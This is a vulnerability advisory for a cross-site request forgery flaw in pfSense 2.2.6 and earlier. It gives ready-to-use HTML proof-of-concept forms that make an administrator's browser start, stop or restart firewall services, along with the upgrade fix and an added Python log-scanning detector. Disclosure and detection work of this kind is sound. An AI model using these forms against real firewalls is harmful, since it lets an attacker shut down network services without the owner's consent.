pfSense Firewall <= 2.2.6 Cross-Site Request Forgery

2016.04.15
Credit: Aatif Shahdad
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

# Exploit Title: pfSense Firewall <= 2.2.6 Cross-Site Request Forgery
# Exploit Author: Aatif Shahdad
# Software Link: http://files.nyi.pfsense.org/mirror/downloads/old/pfSense-LiveCD-2.2.5-RELEASE-i386.iso.gz
# Version: 2.2.6 and below.
# Contact: https://twitter.com/61617469665f736
# Category: webapps

1. Description

An attacker can coerce a logged-in victim's browser to issue requests that will start/stop/restart services on the Firewall.

2. Proof of Concept

Log in to the Web Console, for example, http://192.168.0.1 (set at the time of install) and open the following PoCs:

Start NTPD service:

    <html>
      <body>
        <form action="https://192.168.0.1/status_services.php">
          <input type="hidden" name="mode" value="startservice" />
          <input type="hidden" name="service" value="ntpd" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>

Stop NTPD service:

    <html>
      <body>
        <form action="https://192.168.0.1/status_services.php">
          <input type="hidden" name="mode" value="stopservice" />
          <input type="hidden" name="service" value="ntpd" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>

Restart NTPD service:

    <html>
      <body>
        <form action="https://192.168.0.1/status_services.php">
          <input type="hidden" name="mode" value="restartservice" />
          <input type="hidden" name="service" value="ntpd" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>

The service will automatically start/stop.

Note that the NTPD service can be replaced with any service running on the Firewall. For example, to stop the APINGER (gateway monitoring daemon) service, use the following PoC:

    <html>
      <body>
        <form action="https://192.168.0.1/status_services.php">
          <input type="hidden" name="mode" value="stopservice" />
          <input type="hidden" name="service" value="apinger" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>

3. Solution

Upgrade to version 2.3 at https://www.pfsense.org/download/mirror.php?section=downloads
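The PoC forms carry no method attribute, so the browser submits them as GET and the mode and service parameters land in the request line of the web server's access log. The following added example (not part of the original advisory or of pfSense) flags service actions on status_services.php whose Referer is absent or cross-origin; the Combined Log Format, the function name and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# "mode" values used by the PoC forms in the advisory.
SERVICE_MODES = {"startservice", "stopservice", "restartservice"}

# Combined Log Format is an assumption; adapt the pattern to the real log format.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"$'
)

def cross_site_service_requests(lines, gui_hosts):
    """Return (client, mode, service, referer) for each service action whose
    Referer is missing or names a host other than the firewall GUI."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        target = urlsplit(m["target"])
        if target.path != "/status_services.php":
            continue
        query = parse_qs(target.query)
        mode = query.get("mode", [""])[0]
        if mode not in SERVICE_MODES:
            continue
        # hostname is None for "-" or an empty Referer, so those are reported too.
        if urlsplit(m["referer"]).hostname in gui_hosts:
            continue
        service = query.get("service", [""])[0]
        hits.append((m["client"], mode, service, m["referer"]))
    return hits

# Constructed sample log lines (not taken from a real system).
SAMPLE_LOG = [
    '192.168.0.50 - - [15/Apr/2016:10:00:01 +0000] "GET /status_services.php?mode=restartservice&service=ntpd HTTP/1.1" 200 5120 "https://192.168.0.1/status_services.php" "Mozilla/5.0"',
    '192.168.0.50 - - [15/Apr/2016:10:02:17 +0000] "GET /status_services.php?mode=stopservice&service=apinger HTTP/1.1" 200 5120 "http://forum.example/thread" "Mozilla/5.0"',
    '192.168.0.50 - - [15/Apr/2016:10:03:40 +0000] "GET /status_services.php?mode=startservice&service=ntpd HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.168.0.50 - - [15/Apr/2016:10:04:02 +0000] "GET /status_services.php HTTP/1.1" 200 5120 "https://192.168.0.1/index.php" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in cross_site_service_requests(SAMPLE_LOG, {"192.168.0.1"}):
        print(hit)
```

A missing Referer is only a heuristic signal, since browsers and referrer policies can strip the header from legitimate requests, so those hits need triage rather than automatic blocking.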

References:

http://files.nyi.pfsense.org/mirror/downloads/old/pfSense-LiveCD-2.2.5-RELEASE-i386.iso.gz

